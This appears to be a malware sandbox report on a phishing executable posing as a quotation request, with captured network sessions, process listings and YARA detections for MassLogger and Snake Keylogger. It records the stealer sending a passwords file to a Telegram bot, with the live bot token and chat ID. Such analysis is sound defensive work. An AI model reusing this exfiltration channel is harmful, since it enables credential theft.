                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Host: ww99.fwiwk.biz
                                                                                                                                                                                                                            Dec 16, 2024 14:12:22.019236088 CET278INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:12:21 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Location: http://ww7.fwiwk.biz/wxalwqn?usid=25&utid=8251818455
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.449732172.67.177.1344437360C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-12-16 13:10:21 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            2024-12-16 13:10:22 UTC876INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:22 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 362
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                            Age: 343391
                                                                                                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=555BreKNVGt8IhJa1MbO%2BG8XcfTOpHAci2oNeQB%2B3X1m098S3x5mLNbf23Dc5ErY7BYMV4q4Dy85c2j5fFfq1Ac59jY6KJtaraVhT7NoE4%2B3kcaYcJ0z60g3nuthJBjLZ2kHkgkp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8f2ee9c46c714288-EWR
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1679&rtt_var=646&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1674311&cwnd=245&unsent_bytes=0&cid=4b6d94867e78735a&ts=486&x=0"
                                                                                                                                                                                                                            2024-12-16 13:10:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.449737149.154.167.2204437360C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-12-16 13:10:29 UTC295OUTPOST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary================8dd1da91996ff1a
                                                                                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                                                                                            Content-Length: 1090
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            2024-12-16 13:10:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 61 39 31 39 39 36 66 66 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: --===============8dd1da91996ff1aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                                                                                                            2024-12-16 13:10:30 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:30 GMT
                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                            Content-Length: 556
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                            2024-12-16 13:10:30 UTC556INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 34 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 30 38 36 36 32 37 37 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6b 75 6c 6c 73 6e 6f 76 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 38 33 39 38 32 39 34 37 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 6b 77 61 6e 64 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 6b 75 6c 6c 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 69 67 34 6d 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 36 33 30 2c 22 64 6f 63 75
                                                                                                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":16447,"from":{"id":7708662779,"is_bot":true,"first_name":"NOVA","username":"Skullsnovabot"},"chat":{"id":5839829477,"first_name":"Makwanda","last_name":"Skulls","username":"Big4m","type":"private"},"date":1734354630,"docu


                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:08:10:15
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe"
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            File size:1'553'920 bytes
                                                                                                                                                                                                                            MD5 hash:821AEC135EA3AA8E02FAB9D0CC783A0B
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                            Start time:08:10:16
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            File size:1'396'736 bytes
                                                                                                                                                                                                                            MD5 hash:56CC9A6FF09CF87495300EA7EEC67B33
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:08:10:16
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe"
                                                                                                                                                                                                                            Imagebase:0x7b0000
                                                                                                                                                                                                                            File size:45'984 bytes
                                                                                                                                                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:08:10:16
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:1'332'224 bytes
                                                                                                                                                                                                                            MD5 hash:81093F4AEBE45D63048591DC7BC8A814
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                            Start time:08:10:19
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:1'242'624 bytes
                                                                                                                                                                                                                            MD5 hash:1B98ADE6B240EAC1ED51A8847FC157EB
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                            Start time:08:10:20
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:2'354'176 bytes
                                                                                                                                                                                                                            MD5 hash:422656A98AE1E4FC0F42676F7870266C
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                            Start time:08:10:21
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                            Imagebase:0x1a0000
                                                                                                                                                                                                                            File size:1'463'296 bytes
                                                                                                                                                                                                                            MD5 hash:E78B9CA154BB75A39A7016C4054776F9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:08:10:22
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:1'384'960 bytes
                                                                                                                                                                                                                            MD5 hash:84AD1165D1CC1C542C535B1CFAB6AD15
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                            Start time:08:10:23
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:1'342'464 bytes
                                                                                                                                                                                                                            MD5 hash:5A764611EA22446F05BB79BB3366106F
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                            Start time:08:10:24
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            File size:1'257'472 bytes
                                                                                                                                                                                                                            MD5 hash:95B91FACFA2553E088397F5D45544CBA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                            Start time:08:10:25
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:1'247'744 bytes
                                                                                                                                                                                                                            MD5 hash:1A71445017EDEBF6811D579BE5438F3B
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                            Start time:08:10:26
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:1'846'784 bytes
                                                                                                                                                                                                                            MD5 hash:FEE7BE523832A1DAA28153EE09159969
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:08:10:27
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:1'253'376 bytes
                                                                                                                                                                                                                            MD5 hash:D48C35119955A40BE97FC32494D6DEB1
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:08:10:28
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:1'455'616 bytes
                                                                                                                                                                                                                            MD5 hash:FC42F22F248DDF97255574928099BD4E
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                            Start time:08:10:29
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:1'617'920 bytes
                                                                                                                                                                                                                            MD5 hash:33B97B079F45CE82E6F4A328EBAB3909
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                            Start time:08:10:30
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\TieringEngineService.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\TieringEngineService.exe
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:1'562'112 bytes
                                                                                                                                                                                                                            MD5 hash:0EFAE9B5227A7ADB6C73C07C5181848C
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                            Start time:08:10:31
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\AgentService.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\AgentService.exe
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:1'801'216 bytes
                                                                                                                                                                                                                            MD5 hash:46464B0DFA3DB2510FE14D5EF738D11F
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                            Start time:08:10:31
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:1'303'552 bytes
                                                                                                                                                                                                                            MD5 hash:80D7884B22003F22FE0208D240E92F07
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                            Start time:08:10:33
                                                                                                                                                                                                                            Start date:16/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbengine.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            File size:2'164'736 bytes
                                                                                                                                                                                                                            MD5 hash:04B39AF4F8E72AEADC4486811B47C3B7
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:4%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:7.9%
                                                                                                                                                                                                                              Signature Coverage:6.7%
                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                              Total number of Limit Nodes:62
